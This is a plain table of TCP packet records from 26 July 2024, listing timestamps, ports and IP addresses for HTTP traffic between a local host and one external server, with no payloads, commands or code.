Jul 26, 2024 12:57:50.584501982 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.584502935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.584517002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.584542036 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585043907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585061073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585076094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585107088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585127115 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585129023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585144997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585159063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585175037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585185051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585201025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585206032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585222006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585232019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585246086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585247993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585264921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585272074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585279942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585283995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585295916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585299969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585311890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585313082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585329056 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585331917 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585345030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.585345984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585366011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.585375071 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586097956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586113930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586128950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586143970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586146116 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586157084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586159945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586169004 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586177111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586186886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586186886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586193085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586209059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586218119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586225033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586229086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586241961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586251974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586258888 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.586261988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586282015 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.586299896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.633510113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633810997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633833885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633851051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633867025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633882046 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.633898973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.634025097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.634025097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.679400921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679433107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679449081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679464102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679480076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679495096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679511070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679605961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.679605961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.679863930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679886103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679902077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679918051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679934978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679949999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.679966927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680015087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680015087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680015087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680015087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680016041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680308104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680469036 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680491924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680530071 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680548906 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680562973 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680566072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680608988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680666924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680682898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680699110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680710077 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680713892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680726051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680731058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.680744886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680757046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.680769920 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681199074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681215048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681230068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681243896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681258917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681263924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681276083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681291103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681293011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681303024 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681307077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681323051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681327105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681339979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681350946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681355953 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681369066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681379080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681396961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681813002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681828976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681843996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681858063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.681874990 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.681890011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682094097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682111025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682126045 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682140112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682140112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682156086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682161093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682174921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682195902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682718992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682735920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682750940 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682765961 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682765961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682781935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682784081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682794094 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682797909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682811022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682811975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682823896 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682827950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682842016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682853937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682864904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682878971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682881117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682897091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682925940 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682935953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.682940960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682957888 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682972908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.682987928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683000088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683003902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683018923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683020115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683033943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683041096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683048964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683058023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683064938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683078051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683080912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683088064 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683096886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683104038 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683113098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683128119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683130026 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683142900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683152914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683159113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683173895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683175087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683188915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683196068 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683204889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683217049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683221102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683233976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683237076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683249950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683253050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683260918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683269024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683284998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683290958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683300018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683315992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683320999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683332920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683340073 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683356047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683381081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683753014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683769941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683784962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683800936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683809042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683829069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683847904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683895111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683912039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683928013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683934927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683943987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683959007 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683960915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683969021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683975935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683985949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.683989048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.683999062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684005022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684010983 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684020996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684036016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684041023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684051991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684053898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684067965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684082985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684084892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684103966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684124947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684807062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684824944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684839964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684855938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684870958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684873104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684885979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684890032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684901953 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684904099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684919119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.684923887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684937000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.684953928 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.729397058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729418039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729434013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729453087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.729479074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.729537010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729552031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729567051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729576111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.729612112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.729648113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.729706049 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785187006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785232067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785245895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785250902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785271883 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785285950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785301924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785317898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785348892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785366058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785448074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785464048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785480022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785505056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785533905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785597086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785613060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785628080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785634995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785653114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785662889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785764933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785782099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785823107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785913944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785928965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785945892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785957098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785960913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785978079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.785984993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785984993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.785991907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786000967 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786022902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786031961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786214113 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786230087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786259890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786271095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786297083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786313057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786328077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786339998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786343098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786350012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786359072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786374092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786377907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786389112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.786390066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786397934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.786423922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787053108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787075996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787095070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787105083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787105083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787111044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787127018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787136078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787142992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787143946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787158012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787168980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787169933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787173033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787187099 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787199020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.787203074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.787209034 CEST	60836	80	192.168.2.6	198.46.178.145
